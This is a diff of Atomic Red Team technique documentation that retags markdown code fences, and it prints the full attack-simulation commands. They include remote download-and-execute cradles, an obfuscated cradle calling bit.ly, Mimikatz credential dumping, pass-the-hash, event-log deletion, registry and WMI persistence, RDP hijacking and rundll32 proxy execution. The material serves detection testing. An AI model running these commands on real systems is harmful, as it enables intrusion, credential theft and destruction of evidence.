@@ -27,7 +27,9 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePa #### Attack Commands: Run with `powershell`! -``` + + +```powershell get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL ``` diff --git a/atomics/T1059/T1059.md b/atomics/T1059/T1059.md index 8c4c3d7b..8e2ed186 100644 --- a/atomics/T1059/T1059.md +++ b/atomics/T1059/T1059.md @@ -21,7 +21,9 @@ This will download the specified payload and set a marker file in `/tmp/art-fish #### Attack Commands: Run with `sh`! -``` + + +```sh bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash" ``` diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md index 2bd52117..eddea963 100644 --- a/atomics/T1060/T1060.md +++ b/atomics/T1060/T1060.md @@ -59,12 +59,14 @@ Run Key Persistence #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" ``` #### Cleanup Commands: -``` +```cmd REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f ``` @@ -88,12 +90,14 @@ RunOnce Key Persistence #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" ``` #### Cleanup Commands: -``` +```cmd REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f ``` 
@@ -118,13 +122,15 @@ RunOnce Key Persistence via PowerShell #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $RunOnceKey = "#{reg_key_path}" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore ``` diff --git a/atomics/T1062/T1062.md b/atomics/T1062/T1062.md index ef9a0f27..6ee04f84 100644 --- a/atomics/T1062/T1062.md +++ b/atomics/T1062/T1062.md @@ -26,7 +26,9 @@ Create a New-VM #### Attack Commands: Run with `powershell`! -``` + + +```powershell Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480 diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md index 10f0168a..cdb43c9c 100644 --- a/atomics/T1063/T1063.md +++ b/atomics/T1063/T1063.md @@ -34,7 +34,9 @@ Methods to identify Security Software on an endpoint #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd netsh.exe advfirewall firewall show all profiles tasklist.exe tasklist.exe | findstr /i virus @@ -59,7 +61,9 @@ Methods to identify Security Software on an endpoint #### Attack Commands: Run with `powershell`! -``` + + +```powershell get-process | ?{$_.Description -like "*virus*"} get-process | ?{$_.Description -like "*carbonblack*"} get-process | ?{$_.Description -like "*defender*"} @@ -82,7 +86,9 @@ Methods to identify Security Software on an endpoint #### Attack Commands: Run with `sh`! -``` + + +```sh ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService ``` 
@@ -103,7 +109,9 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd fltmc.exe | findstr.exe 385201 ``` @@ -123,7 +131,9 @@ Discovery of installed antivirus products via a WMI query. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List ``` diff --git a/atomics/T1064/T1064.md b/atomics/T1064/T1064.md index 404857a3..346e6fa4 100644 --- a/atomics/T1064/T1064.md +++ b/atomics/T1064/T1064.md @@ -23,7 +23,9 @@ Creates and executes a simple bash script. #### Attack Commands: Run with `sh`! -``` + + +```sh sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" chmod +x /tmp/art.sh @@ -52,13 +54,15 @@ Creates and executes a simple batch script. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create} C:\Windows\system32\cmd.exe /Q /c #{script_to_create} ``` #### Cleanup Commands: -``` +```cmd del #{script_to_create} >nul 2>&1 ``` diff --git a/atomics/T1065/T1065.md b/atomics/T1065/T1065.md index 3ce7ebb0..68106002 100644 --- a/atomics/T1065/T1065.md +++ b/atomics/T1065/T1065.md @@ -25,7 +25,9 @@ Testing uncommonly used port utilizing PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell test-netconnection -ComputerName #{domain} -port #{port} ``` @@ -51,7 +53,9 @@ Testing uncommonly used port utilizing telnet. #### Attack Commands: Run with `sh`! -``` + + +```sh telnet #{domain} #{port} ``` diff --git a/atomics/T1069/T1069.md b/atomics/T1069/T1069.md index 4c136186..64c077d8 100644 --- a/atomics/T1069/T1069.md +++ b/atomics/T1069/T1069.md 
@@ -41,7 +41,9 @@ Permission Groups Discovery #### Attack Commands: Run with `sh`! -``` + + +```sh dscacheutil -q group dscl . -list /Groups groups @@ -63,7 +65,9 @@ Basic Permission Groups Discovery for Windows #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net localgroup net group /domain net group "domain admins" /domain @@ -90,7 +94,9 @@ Permission Groups Discovery utilizing PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell get-localgroup get-ADPrincipalGroupMembership #{user} | select name ``` @@ -111,7 +117,9 @@ Runs "net group" command including command aliases and loose typing to simulate #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net group /domai "Domain Admins" net groups "Account Operators" /doma net groups "Exchange Organization Management" /doma diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 586a0fdf..635b301d 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -50,7 +50,9 @@ Clear Windows Event Logs #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd wevtutil cl #{log_name} ``` @@ -70,7 +72,9 @@ Manages the update sequence number (USN) change journal, which provides a persis #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd fsutil usn deletejournal /D C: ``` @@ -90,7 +94,9 @@ Delete system and audit logs #### Attack Commands: Run with `sh`! -``` + + +```sh rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* ``` @@ -116,7 +122,9 @@ This test overwrites the Linux mail spool of a specified user. This technique wa #### Attack Commands: Run with `bash`! -``` + + +```bash echo 0> /var/spool/mail/#{username} ``` @@ -141,7 +149,9 @@ This test overwrites the specified log. This technique was used by threat actor #### Attack Commands: Run with `bash`! -``` + + +```bash echo 0> #{log_path} ``` 
@@ -161,14 +171,16 @@ Recommended Detection: Monitor for use of the windows event log filepath in Powe #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId Stop-Process -Id $eventLogId -Force Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx ``` #### Cleanup Commands: -``` +```powershell Start-Service -Name EventLog ``` @@ -187,7 +199,9 @@ Clear event logs using built-in PowerShell commands #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Clear-EventLog -logname Application ``` diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md index f0f67bbe..17fb6d17 100644 --- a/atomics/T1071/T1071.md +++ b/atomics/T1071/T1071.md @@ -39,7 +39,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m #### Attack Commands: Run with `powershell`! -``` + + +```powershell Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null @@ -68,7 +70,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd curl -s -A "HttpBrowser/1.0" -m3 #{domain} curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} @@ -97,7 +101,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m #### Attack Commands: Run with `sh`! -``` + + +```sh curl -s -A "HttpBrowser/1.0" -m3 #{domain} curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} 
@@ -129,7 +135,9 @@ The intent of this test is to trigger threshold based detection on the number of #### Attack Commands: Run with `powershell`! -``` + + +```powershell for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} ``` @@ -160,7 +168,9 @@ This behaviour is typical of implants either in an idle state waiting for instru #### Attack Commands: Run with `powershell`! -``` + + +```powershell Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime} ``` @@ -189,7 +199,9 @@ The simulation involves sending DNS queries that gradually increase in length un #### Attack Commands: Run with `powershell`! -``` + + +```powershell Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} ``` @@ -219,7 +231,9 @@ https://github.com/lukebaggett/dnscat2-powershell #### Attack Commands: Run with `powershell`! -``` + + +```powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} ``` 
@@ -246,13 +260,15 @@ Uses cscript //E:jscript to download a file #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} cscript //E:Jscript #{script_file} ``` #### Cleanup Commands: -``` +```cmd del #{script_file} /F /Q >nul 2>&1 ``` diff --git a/atomics/T1073/T1073.md b/atomics/T1073/T1073.md index df89b15a..94a222b8 100644 --- a/atomics/T1073/T1073.md +++ b/atomics/T1073/T1073.md @@ -24,12 +24,14 @@ GUP is an open source signed binary used by Notepad++ for software updates, and #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd $PathToAtomicsFolder\T1073\bin\GUP.exe ``` #### Cleanup Commands: -``` +```cmd taskkill /F /IM #{process_name} ``` diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index b13ab751..9fcdeb6e 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -23,7 +23,9 @@ Utilize powershell to download discovery.bat and save to a local file #### Attack Commands: Run with `powershell`! -``` + + +```powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log ``` @@ -43,7 +45,9 @@ Utilize curl to download discovery.sh and execute a basic information gathering #### Attack Commands: Run with `bash`! -``` + + +```bash curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log ``` 
@@ -63,12 +67,14 @@ Use living off the land tools to zip a file and stage it in the Windows temporar #### Attack Commands: Run with `powershell`! -``` + + +```powershell Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip ``` #### Cleanup Commands: -``` +```powershell Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore ``` diff --git a/atomics/T1075/T1075.md b/atomics/T1075/T1075.md index 9fbccb58..66961cde 100644 --- a/atomics/T1075/T1075.md +++ b/atomics/T1075/T1075.md @@ -29,7 +29,9 @@ Note: must dump hashes first #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} ``` @@ -58,20 +60,23 @@ command execute with crackmapexec #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} ``` + #### Dependencies: Run with `powershell`! ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) ##### Check Prereq Commands: -``` +```powershell if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} ``` diff --git a/atomics/T1076/T1076.md b/atomics/T1076/T1076.md index c6461ff1..408cacc5 100644 --- a/atomics/T1076/T1076.md +++ b/atomics/T1076/T1076.md @@ -23,14 +23,16 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" net start sesshijack ``` #### Cleanup Commands: -``` +```cmd sc.exe delete sesshijack ``` 
@@ -55,20 +57,23 @@ Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonser #### Attack Commands: Run with `powershell`! -``` + + +```powershell Connect-RDP -ComputerName #{logonserver} -User #{username} ``` + #### Dependencies: Run with `powershell`! ##### Description: Computer must be domain joined ##### Check Prereq Commands: -``` +```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Joining this computer to a domain must be done manually ``` diff --git a/atomics/T1077/T1077.md b/atomics/T1077/T1077.md index 86a613fd..16c1f3f0 100644 --- a/atomics/T1077/T1077.md +++ b/atomics/T1077/T1077.md @@ -35,7 +35,9 @@ Connecting To Remote Shares #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" ``` @@ -62,7 +64,9 @@ Map Admin share utilizing PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} ``` @@ -88,7 +92,9 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd psexec.exe #{remote_host} -c #{command_path} ``` @@ -115,7 +121,9 @@ This technique is used by post-exploitation frameworks. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 ``` diff --git a/atomics/T1081/T1081.md b/atomics/T1081/T1081.md index 1b853732..444ccf72 100644 --- a/atomics/T1081/T1081.md +++ b/atomics/T1081/T1081.md 
@@ -29,7 +29,9 @@ In cloud environments, authenticated user credentials are often stored in local #### Attack Commands: Run with `sh`! -``` + + +```sh python2 laZagne.py all ``` @@ -54,7 +56,9 @@ Extracting credentials from files #### Attack Commands: Run with `sh`! -``` + + +```sh grep -ri password #{file_path} ``` @@ -74,7 +78,9 @@ Extracting Credentials from Files #### Attack Commands: Run with `powershell`! -``` + + +```powershell findstr /si pass *.xml *.doc *.txt *.xls ls -R | select-string -Pattern password ``` @@ -95,7 +101,9 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd type C:\Windows\Panther\unattend.xml > nul 2>&1 type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1 ``` diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index c2a9ed3b..4a1f0c99 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -51,7 +51,9 @@ Identify System Info #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ``` @@ -72,7 +74,9 @@ Identify System Info #### Attack Commands: Run with `sh`! -``` + + +```sh systemsetup system_profiler ls -al /Applications @@ -94,7 +98,9 @@ Identify System Info #### Attack Commands: Run with `sh`! -``` + + +```sh uname -a >> /tmp/loot.txt cat /etc/lsb-release >> /tmp/loot.txt cat /etc/redhat-release >> /tmp/loot.txt @@ -118,7 +124,9 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot #### Attack Commands: Run with `bash`! -``` + + +```bash cat /sys/class/dmi/id/bios_version | grep -i amazon cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware" cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU" 
@@ -145,7 +153,9 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup #### Attack Commands: Run with `bash`! -``` + + +```bash sudo lsmod | grep -i "vboxsf\|vboxguest" sudo lsmod | grep -i "vmw_baloon\|vmxnet" sudo lsmod | grep -i "xen-vbd\|xen-vnif" @@ -169,7 +179,9 @@ Identify system hostname for Windows. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd hostname ``` @@ -189,7 +201,9 @@ Identify system hostname for Linux and macOS systems. #### Attack Commands: Run with `bash`! -``` + + +```bash hostname ``` @@ -209,7 +223,9 @@ Identify the Windows MachineGUID value for a system. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid ``` diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 6eb54bb9..5af55518 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -31,7 +31,9 @@ Find or discover files on the file system #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download dir /s "c:\Program Files\" >> %temp%\download @@ -58,7 +60,9 @@ Find or discover files on the file system #### Attack Commands: Run with `powershell`! -``` + + +```powershell ls -recurse get-childitem -recurse gci -recurse @@ -86,7 +90,9 @@ https://perishablepress.com/list-files-folders-recursively-terminal/ #### Attack Commands: Run with `sh`! -``` + + +```sh ls -a > allcontents.txt ls -la /Library/Preferences/ > detailedprefsinfo.txt file */* *>> ../files.txt @@ -112,7 +118,9 @@ Find or discover files on the file system #### Attack Commands: Run with `sh`! -``` + + +```sh cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt cat /etc/mtab > /tmp/loot.txt find . -type f -iname *.pdf > /tmp/loot.txt diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md index 67610802..999c4ee5 100644 --- a/atomics/T1084/T1084.md 
+++ b/atomics/T1084/T1084.md @@ -25,7 +25,9 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; @@ -44,7 +46,7 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa ``` #### Cleanup Commands: -``` +```powershell $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md index 4a6edd99..1ac74071 100644 --- a/atomics/T1085/T1085.md +++ b/atomics/T1085/T1085.md @@ -36,7 +36,9 @@ Test execution of a remote script using rundll32.exe #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); ``` @@ -63,7 +65,9 @@ Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) ``` 
@@ -90,20 +94,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, ``` + #### Dependencies: Run with `powershell`! ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" ``` @@ -129,20 +136,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, ``` + #### Dependencies: Run with `powershell`! ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" ``` 
@@ -168,20 +178,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} ``` + #### Dependencies: Run with `powershell`! ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" ``` @@ -207,20 +220,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} ``` + #### Dependencies: Run with `powershell`! ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" ``` diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md index c019c31f..6c8e2c09 100644 --- a/atomics/T1086/T1086.md +++ b/atomics/T1086/T1086.md 
@@ -56,7 +56,9 @@ Download Mimikatz and dump credentials #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" ``` @@ -81,7 +83,9 @@ Download Bloodhound and run it #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound" ``` @@ -102,7 +106,9 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR #### Attack Commands: Run with `powershell`! -``` + + +```powershell (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) 
@@ -124,7 +130,9 @@ Run mimikatz via PsSendKeys #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr ``` 
